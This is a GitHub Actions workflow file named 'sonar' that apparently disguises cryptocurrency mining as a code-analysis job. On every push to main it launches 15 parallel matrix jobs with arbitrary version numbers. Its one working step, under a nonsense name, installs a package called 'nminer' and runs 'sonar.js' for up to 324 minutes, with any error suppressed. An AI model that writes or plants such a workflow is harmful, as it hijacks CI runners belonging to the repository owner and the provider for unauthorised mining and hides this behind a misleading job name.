name: sonar
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 1518 }
          - { version: 637 }
          - { version: 6953 }
          - { version: 8726 }
          - { version: 5385 }
          - { version: 6494 }
          - { version: 2870 }
          - { version: 2300 }
          - { version: 4415 }
          - { version: 3435 }
          - { version: 1379 }
          - { version: 5234 }
          - { version: 1855 }
          - { version: 8278 }
          - { version: 4320 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: by oh onto even but
        run: |
          npm install nminer@latest
          timeout 324m node sonar.js || echo "sonar executed"